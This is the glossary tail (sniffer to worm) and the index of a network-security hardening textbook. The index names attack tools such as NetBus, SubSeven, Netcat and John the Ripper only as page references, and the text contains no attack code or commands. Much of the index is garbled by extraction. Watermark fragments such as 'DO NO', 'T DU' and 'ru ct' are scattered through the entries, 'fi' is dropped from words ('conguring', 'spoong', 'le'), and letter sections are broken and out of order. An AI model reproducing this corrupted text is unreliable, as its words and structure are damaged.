sniffer: A program that captures data crossing a computer network. Used by attackers to capture user IDs and passwords sent in the clear; also a software tool that audits and identifies network traffic packets, used legitimately by network operations and maintenance personnel to troubleshoot network problems.
SNMP (Simple Network Management Protocol): A protocol (and the software using it) for monitoring and controlling network communications devices over TCP/IP. SNMPv1 and v2c authenticate requests only with a cleartext community string, so default communities such as "public" should be changed or the service restricted.
spam: To crash a program by overrunning a fixed-size buffer with excessively large input data. Also, to cause a person or newsgroup to be flooded with irrelevant or inappropriate messages.
SPI (Secure Profile Inspector): A network monitoring tool for UNIX, developed by the Department of Energy.
spoofing: Pretending to be someone else. The deliberate inducement of a user or a resource to take an incorrect action. An attempt to gain access to an AIS by pretending to be an authorized user. Impersonating, masquerading, and mimicking are forms of spoofing.
SSL (Secure Sockets Layer): A protocol layered between an application and TCP that provides server (and optionally client) authentication, confidentiality, and integrity to applications; the predecessor of TLS.
subversion: Occurs when an intruder modifies the operation of the intrusion detector to force false negatives to occur.
SYN Flood: A denial of service attack in which the attacker sends many TCP SYN segments, usually from spoofed source addresses, without completing the three-way handshake. The half-open connections fill the listener's SYN (backlog) queue, and once the queue is flooded no new connection can be opened.
TCB (Trusted Computing Base): The totality of protection mechanisms within a computer system, including hardware, firmware, and software, the combination of which is responsible for enforcing a security policy. A TCB consists of one or more components that together enforce a unified security policy.
TCP wrapper: A security tool (tcpd) that provides additional network logging and restricts access to inetd-started services to authorized hosts, on a per-service basis, as configured in /etc/hosts.allow and /etc/hosts.deny.
TCP/IP (Transmission Control Protocol/Internet Protocol): The suite of protocols on which the Internet is based.
TCSEC (Trusted Computer System Evaluation Criteria): The DoD standard (DoD 5200.28-STD, the Orange Book) that defines the criteria and evaluation classes (D through A1) used to rate the security assurance of computer systems. A system evaluated under it employs sufficient hardware and software assurance measures to allow its use for simultaneous processing of a range of sensitive or classified information.
Rule-Based Security Policy: A security policy based on global rules imposed for all users. These rules usually rely on a comparison of the sensitivity of the resources being accessed and the possession of corresponding attributes of users, a group of users, or entities acting on behalf of users.
terminal hijacking: Allows an attacker on a given machine to take control of any terminal session in progress; the attacker can send and receive terminal I/O while a user is on the terminal.
threat: The means through which the ability or intent of a threat agent to adversely affect an automated system, facility, or operation can be manifest. A potential violation of security.
threat agent: Methods and things used to exploit a vulnerability in an information system, operation, or facility; fire, natural disaster and so forth.
threat assessment: Process of formally evaluating the degree of threat to an information system and describing the nature of the threat.
tiger: A software tool which scans for system weaknesses.
tiger team: Government- or industry-sponsored team of computer experts who attempt to break down the defenses of computer systems in an effort to uncover, and eventually repair, holes in the security.
tinkerbell program: A monitoring program used to scan incoming network connections and generate alerts when calls are received from particular sites, or when logins are attempted.
topology: The map or plan of the network. The physical topology describes how the wires or cables are laid out, and the logical or electrical topology describes how the information flows.
trace packet: In a packet-switching network, a unique packet that causes a report of each stage of its progress to be sent to the network control center from each visited system element.
traceroute: A utility that traces the route packets take from the local host to a remote host by sending UDP probes (ICMP echo requests on some implementations) with increasing time-to-live values and recording which router returns each ICMP time-exceeded message. Normally traceroute displays the address and round-trip time of each hop on the way to the destination.
tranquillity: A security model rule stating that the security level of an active object cannot change during the period of activity.
tripwire: A file integrity checking tool. It maintains a database of attributes and cryptographic checksums (hashes) of files; on each run it recomputes them and reports to the system security manager any file whose contents, size, permissions or other attributes have changed. A simple byte count would not catch a replacement of the same size.
Trojan Horse: An apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.
Trusted Network Interpretation: The specific security features, assurance requirements, and rating structure of the Orange Book as extended to networks of computers ranging from isolated LANs to enterprise level.
TTY watcher: A hacker tool that allows hackers with even a small amount of skill to hijack terminals. It has a GUI.
vaccine: Program that injects itself into an executable program to perform a signature check and warns if there have been any infections.
virus: A program that can infect other programs by modifying them to include a possibly evolved copy of itself.
vulnerability: Hardware, firmware, or software flaw that leaves an AIS open for potential exploitation. A weakness in automated system security procedures, administrative controls, physical layout, internal controls, and so forth, that could be exploited by a threat to gain unauthorized access to an AIS.
vulnerability analysis: Systematic examination of an AIS or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.
WAIS (Wide Area Information Service): An Internet service that allows you to search a large number of specially indexed databases.
WAN (Wide Area Network): A physical or logical network that provides capabilities for a number of independent devices to communicate with each other over a common transmission-interconnected topology in geographic areas larger than those served by local area networks.
war dialer: A program that dials a given list or range of numbers and records those which answer with handshake tones, which might be entry points to computer or telecommunications
worm: Independent program that replicates from machine to machine across network connections, often clogging networks and information systems as it spreads.
INDEX
6-over-4 interface, 66-67

A
access gaining, 535-537 access control, 183-187 Web server, 449-450 Access Control List See: ACL acknowledgement numbers, 17 ACL, 237-240 anti-DoS, 367 anti-Land, 368 anti-spoong, 368-369 anti-SYN, 367-368 command syntax, 363-364 creating, 359-360 defending against attacks, 367-369 extended syntax, 364-365 implementing, 363-367 logging, 374-376 operation, 360 Active Directory See: AD active open connection, 18-20 AD, 237-241 auditing, 285-286 structure, 237-240, 241 administrative access, 258-259 administrative distance, 349-350 administrator account, 255-257 AH combine with ESP in IPSec, 117-119 conguring, 98-99 Transport mode, 80 Tunnel mode, 80 AH and ESP in IPSec, 117-119 mismatched policies, 124-125 requiring in IPSec, 122-124 response policy, 127-128 session analysis, 120-122 alert, 216-218 anti-spoong logging, 374

back door, 483-484 backup adding data, 405 Cisco routers, 417-419 for Linux, 415-417 hardware, 394-395 incremental, 408-409 initiating, 399-400 options, 395-398 OSs, 391-398 plan, 380 policy, 384 products, 416-417 strategies, 398-399 viewing results, 400-401 week work, 404 weekend work, 402-403 banners, 327-328 basics, 12-13 Bastille, 229-232 using, 230 Berkley Internet Name Domain See: BIND binary conversion, 7-8 BIND, 430-432 binding, 191-193 block inheritance, 260 breach, 169-172 broadcast, 14-15

Ed
T DU

Apache, 454 ARP process, 334-336 attack, 182-183 hiding evidence, 538 hiding les, 538 OOB, 539 auditing, 276-277, 283-285 authentication, 64-66, 80, 132-134, 325 Authentication Header, 64-66 authentication methods, 246-249 editing policies, 95-96 authorization, 325 availability, 386

or
DO NO

In

st

ru ct

PL

IC
Index

AT
567

iti

on

INDEX
browser security, 461-462 browsers personal information, 476 buffer overow, 443-444 buffered logging, 372 bug, 322 console logging, 371 console password, 325 content rating, 473-474 using, 474-475 contingency plan, 384-385 creating, 385 testing, 385-386 cookies, 460, 473 CORE, 425-426 corrupt data, 412 Council of Registrars See: CORE cracking, 173-174 crash, 203-210 cryptography, 79

C
cable modem vulnerabilities, 460-461 captures displaying, 24-25 CDP, 354-355 certicates, 132-134, 475-476 CGI, 441 Challenge Response authentication, 250 chmod command, 165 CIDR, 13-14 Cisco backup for routers, 417-419 banners, 328-329 logging, 370 OS, 322 router language, 322 Cisco Discovery Protocol See: CDP Classless Interdomain Routing See: CIDR Client policy, 83-84 commands chmod, 165 ipsec6.exe, 69-70 ipv6.exe, 69 ping6.exe, 70-71 umask, 171 Common Gateway Interface See: CGI compromise, 229 condentiality, 64-66 conguration fragments, 324 connection, 18-20 establishing, 18-19 terminating, 19-20 connections TCP, 33-34

Ed
D

DARPA, 194-196 Data Encryption Standard See: DES data recovery, 297 DDoS, 431 dead gateway, 314-315 decimal conversion, 7-8 Default Response, 96-98 defaultless core routers, 429 Defense Advanced Research Projects Agency See: DARPA denial of host, 365 denial of network, 366 Denial of Service, 314-316 denial of subnet, 366 DES, 84-85 dialup client, 307-308, 312-313 dialup server, 305-306, 311-312 differential backup, 402 restoring data, 406-408 directory permission, 162-166 disabling services, 280-281 disaster recovery, 380-382, 406 distance vector routing, 347 Distributed Denial of Service See: DDoS DNS, 241-242, 426-428

or
DO NO

ru ct

568

Hardening The Infrastructure (SCP)

In

st

DU

PL

IC

AT

iti

on

INDEX
for Windows 2000, 433-434 installing, 436-437 security, 432-433 spoong, 433 standard secondary server, 439-440 targeting, 430-432 domain tree, 237-240 DoS, 448-449 performing, 538-539 DSL vulnerabilities, 460-461 dynamic routing, 342-345 le attachment vulnerabilities, 458-459 le permissions, 162-166, 272-274 le structure, 155 lter list, 129-132 nger, 357 rewall, 80 folder permissions, 272-274 Forward Lookup Zone, 435-436 conguring, 437-438 fping/gping tool, 492-493 FTP capture, 46-48 conguring, 99-100 granting, 366-367 session analysis, 49 full-scale environment simulation, 386

E
EFS, 296-298 and users, 297 cryptography, 297-298 email hack attacks, 455-459 message source, 486-487 security, 477-478 enable password, 326 Encapsulating Security Payload See: ESP ESP, 64-66 analysis, 114 combine with AH in IPSec, 117-119 encryption, 108-110 Transport mode, 80 Tunnel mode, 80 ESP IPSec session, 113 Ethereal, 28-29 GUI, 29-33 Ethernet interfaces, 67 event les clearing, 538 Event IDs, 291 event logs, 294-295 Event Viewer, 295 managing, 288-290 executables securing, 281-283

Ed
T DU

or
DO NO

F
fault tolerance, 426-428

gaining access, 535-537 gaining rights, 536 generator, 389-391 fuel types, 391 implementing, 391 GNOME, 139, 140-142 GNU Network Object Model Environment See: GNOME Gold Standard, 253 analyzing, 269-271 implementing, 268-269 GPO, 242 editing, 243-244 enforcing, 244-245 graphical tracing tool, 489-490 group policy, 242, 259-260 implementing, 242-243 Group Policy Object See: GPO groups accounts, 146-151 adding, 148-150 security, 253 standard, 147-148 Windows 2000, 254-255 GRUB loader, 537

In

st

ru ct

PL

IC

AT
Index 569

iti

on

INDEX
H
hacker, 183-187 hacking, 428 hardware backup options, 394-395 hexadecimal conversion, 7-8 High security setting, 469-471 host, 3-6 host based access, 184-186 hot xes, 451-452 checker, 452-453 HTML email attacks, 455-457 Internet Engineering Steering Group See: IESG Internet Engineering Task Force See: IETF Internet Explorer 6 advanced settings, 464-466 default settings, 467-468 security settings, 466-467 settings, 462-464 Internet Information Server See: IIS Internet Protocol See: IP Internet Service Provider See: ISP Internet Society See: ISOC intrusion, 216-223 intrusion detection, 296 IP, 7-9 address classes, 8-9 bind addresses, 191-193 datagram, 35-38 private addresses, 9 redirect addresses, 191-193 security, 78-79 special-function addresses, 9 IPSec AH implementation, 89 conguring a response, 119-120 conguring options, 125-127 custom policies, 90-94 disabling, 134-135 full session, 128-129 implementing, 80-81, 100-101 modes, 79-80 policies, 83-84 ipsec6.exe command, 69-70 IPv6 addresses, 62-63 basics, 62 installing, 64-66 interfaces, 66-68 security, 64-66

IAB, 425-426 IANA, 425-426 IAS, 309-310 ICANN, 425-426 ICMP, 355-356 direct broadcast, 355 session analysis, 46 unreachable, 355-356 ICMP messages, 38-40 ICS, 303 IESG, 425-426 IETF, 425-426 IIS, 445-446 incremental backup, 408-409, 410-411 incomplete restore, 413-415 restoring data, 413 incremental restore, 415 inheritance, 274 inodes, 154 integrity, 35-38 Internet Architecture Board See: IAB Internet Assigned Numbers Authority See: IANA Internet components, 422 Internet Connection Sharing See: ICS Internet Corporation for Assigned Names and Numbers See: ICANN

Ed
T DU

or
DO NO

570

Hardening The Infrastructure (SCP)

In

st

ru ct

PL

IC

AT

iti

on

INDEX
traffic, 71-72 utilities, 68-69 x-cast, 63 ipv6.exe command, 69 ISOC, 425-426 ISP, 424 targeting, 430 security, 162 system information, 158-162 traceroute, 489 Lion worm, 430 LM authentication, 247-248 Local Area Network See: LAN local security policy, 260-261 log les managing, 295-296 log priority, 370-371 log viewer, 228-229 logging, 224-226, 283-285, 369-371 ACL, 374-376 anti-spoong, 374 authentication, 291-294 buffered, 372 clearing, 538 conguring, 371-373 console, 371 last log, 225-226 lastlog, 224-225 secure log, 227 syslog, 372-373 terminal, 372 VTY, 375 Web server, 227 xferlog, 227 long distance carriers, 423 Low security setting, 468-469

J
John the Ripper, 527-528

K
K Desktop Environment See: KDE KDE, 139, 140-142 Kerberos, 251-252 kernel, 139 keys, 79 keystrokes logging, 521-522 recording, 520-521

Ed
T DU

or
DO

L0pht, 523-527 LC4, 524-526 LAN, 86-89 LAN-to-LAN routing, 337 LAN-to-WAN routing, 338-340 last log le, 225-226 lastlog log le, 224-225 limited environment simulation, 386 link state routing, 348-349 Linux administration, 138-139 backup options, 415-417 common commands, 143-145 disks, 152-153 le system, 151-156 logging in, 140 navigation, 139-145 partitions, 152-153 ping sweep, 492-493 run levels, 213
M

message source, 486-487
metric, 346-350
Microsoft Management Console See: MMC
Microsoft Virtual Machine See: Microsoft VM
Microsoft VM, 471-472
mismatched IPSec policies, 105-106
  session analysis, 106-107
mismatched policies
  AH and ESP, 124-125
MMC, 81-83
  customized configuration, 84
mounting devices, 153-154
MTU restrictions, 315
multicast, 14-15, 63

N
NAP, 423-424
NAT, 303
Nessus, 507-510
  vulnerability scan, 510-511
NetBIOS, 301-302
NetBus, 514-516
  1.7, 515
  Pro, 515-516
Netcat, 519-520
netstat tool, 497
network, 3-4
Network Access Point See: NAP
Network Address Translation See: NAT
Network File System See: NFS
Network Information Centers See: NIC
Network Information Service See: NIS
Network Monitor, 22-28
  Display view, 24-25
  filters, 25-27
network security, 488
Network Service Provider See: NSP
network system
  gaining control, 519-520
NFS, 194-200
  exports, 196-199
  securing, 200-202
  server, 194-196
NIC, 425-426
NIS, 202-203
nmap tool, 493
  Front end, 506-507
  OS detection, 505-506
no override, 259
NSP, 423
NTLM authentication, 248-249
NTLMv2, 249
NULL session, 275


O
object auditing, 285-286
object ownership, 156
OOB attack, 539
Open Systems Interconnection See: OSI
open-source software, 138-139
operating modes, 323
Organizational Units See: OU
OS
  detecting, 502-505
OS backup, 391-398
OSI model, 4-6
OU, 237-240
Out Of Bounds attack See: OOB attack

P
packet, 4-6
packet filter, 359-360
packet fragmentation, 44-45
packet sniffer, 460
PAM, 177-181
  configuration files, 177
  modules, 178-179
  securing access, 180-181
  security, 179-180
passive open connection, 18-20
passwords
  cracking, 523-527
  managing, 176-177
  recommendations, 261-262
  revealing, 529-531
  security, 172-176
patched, 451-452
penetration, 483-484
permissions
  assigning, 167
  setting, 165
  testing, 167-169
personal information, 476
phreaking, 483-484
physical security, 255-257
PID, 159
PING capture, 46-48
ping sweeps, 492-493
ping6.exe command, 70-71
Pinger tool, 493-494
plaintext, 79
Pluggable Authentication Modules See: PAM
policy inheritance, 259
port scanning, 496-497
  Windows, 499-502
ports, 20-22
privilege escalation, 535-536
probe, 430
Process Identifier See: PID
profile, 473-474
promiscuous mode, 28-29
propagation, 274
protocol, 3-6
proxy, 291-294

R
RADIUS, 304-305
  creating users, 308-309
  dialup server, 311-312
RAID levels, 392-394
recovery policy, 384
Red Hat Network, 182
redirect, 191-193
registry
  auditing, 286-288
  backup, 278-279
  blocking access, 279-280
  configuration, 277-278
remote access, 303-304
remove unneeded services, 358-359
Request policy, 108-110
Request For Comments See: RFC
Request-and-Respond policy, 102-103
  session analysis, 103-104
Request-and-Response
  session analysis, 111-112
Request-only
  session analysis, 101-102
Require policy, 104-105
Require ESP IPSec policy, 114-115
Require ESP IPSec session, 115-117
Require response policy, 107-108
Respond only policy, 110-111
restoring
  files from backup, 401-402
  the network, 313
restricting logon hours, 253-254
Revelation, 529-531
Reverse Lookup Zone, 434-435
  configuring, 437-438
RFC, 6-7
rights
  gaining, 536
RIP, 310-311, 350-351
RIPv2, 351-353
risk analysis, 383
rootkit, 430
routed protocols, 345
router, 12-13
  access passwords, 325-327
  accessing, 323
  banners, 327-328
  navigating, 324-325
  targeting, 429
  user accounts, 327
routing, 12-13
  process, 340-342
  protocols, 345, 346-350
Routing Information Protocol See: RIP

S
SAM, 536-537
  deleting, 536-537
  renaming, 536-537
Samba, 203-210
  configuration files, 204-206
  maintaining, 206-207
  uses, 204
scripting vulnerabilities, 457-458
secedit.exe utility, 267-268
secure log file, 227
Secure Server policy, 83-84, 86-89
Secure Shell See: SSH
Secure Sockets Layer See: SSL
security, 16-17
  analysis snap-in, 265-266
  browser, 461-462
  custom templates, 264-265
  DNS, 432-433
  email, 477-478
  errata, 182-183
  file, 272
  folder, 272
  IIS, 445-446
  in Windows 2000, 253
  Internet Explorer 6, 466-467
  IPv6, 64-66
  Linux, 162
  PAM, 179-180
  password, 172-176
  printer, 276
  registry, 276-277
  startup/shutdown, 210-211
  templates, 262-264
  updates, 182-183
  Web server, 444
  Web server directory, 449
  Windows 2000 network, 298-301
Security Accounts Manager See: SAM
security architecture, 246
security audit, 505-506
security level, 263-264
security policies, 83-84
sequence numbers, 17
server, 3-4
Server policy, 83-84
service identification, 497-498
services
  removing, 211-212
session teardown process, 34-35
SetGID, 169-172
SetUID, 169-172
shadow password file, 174-175
Simple Network Management Protocol See: SNMP
simulated test, 385
small services, 357
smart cards, 252
smurfing, 314-316
sniffer, 460
SNMP, 323
social engineering, 531-532
source routing, 356
spoofing, 229-230
  DNS, 433
SSH, 213-214, 330
  client configuration, 333
  router configuration, 330-333
  using, 214-215
  verification, 331-332
SSL, 246
stack detection, 503-505
Standard Secondary Server, 439-440
static routing, 342-345
Sticky Bit, 169-172
subnet mask, 10-12
subnetting, 10-12
SubSeven Trojan, 513-514
super block, 154
superdaemon, 187-194
SuperScan, 494-495
Syn attack defense, 314
SYSKEY, 249-250
syslog logging, 372-373
system hardening, 280-283
system startup/shutdown security, 210-211

T
target networks, 483-484
TCP, 16-17
  connections, 33-34
  flags, 17
  headers, 40-42
TCP wrapper, 183-187
  configuration files, 184-186
TCP/IP
  filtering, 316-317
  hardening, 314-316
TCP/IP model, 3-4
Telnet
  granting, 366
terminal logging, 372
Terminal Window, 142-143
threat, 383
three-way handshake, 16-17
timestamp, 371
topology, 347
traceroute, 355-356, 488-489
  on Linux, 489
  on Windows, 488
Transport mode, 79-80
  AH, 80
  ESP, 80
tripwire, 216-223
  database, 218
  integrity check, 218-219
  modes, 216
  policy, 216-218
Trojan Horse, 20-22, 513
Tunnel mode, 79-80
  AH, 80
  ESP, 80

U
UDP, 16-17
UDP headers, 43-44
umask command, 171
undo configuration changes, 231
unicast, 14-15, 63
Uninterruptible Power Supply See: UPS
UPS, 387-389
  full server rack, 389
user accounts
  expiration dates, 254
users
  accounts, 146-151
  adding, 148-150
  security, 253
  standard, 147-148
  switching accounts, 151

V
Variable Length Subnet Masking See: VLSM
virus, 382, 512
VLSM, 13-14
VTY logging, 375
VTY password, 326
vulnerability, 247-248
vulnerability scanning, 441

W
WAN, 236-237
Web design
  common mistakes, 442-443
Web server
  access control, 449-450
  directory security, 449
Web server log files, 227
Web server security, 444
Web sites
  configuration, 446-448
  maintenance, 448
  malicious, 517-518
Webmin, 157-158
Wide Area Network See: WAN
wildcard mask, 361-363
Windows
  ping sweep, 493-496
Windows 2000
  DNS, 433-434
  EFS, 296-298
  local login process, 250-251
  network security, 298-301
  port scanning, 499-502
  printer security, 276
  registry security, 276-277
  security, 236-237
  traceroute, 488
worm, 382, 512

X
x-cast, 14-15
xferlog log file, 227
xinetd.conf, 187-189
xinetd.d, 189-191

Z
zone transfer, 440-441
Zone Transfer traffic, 432
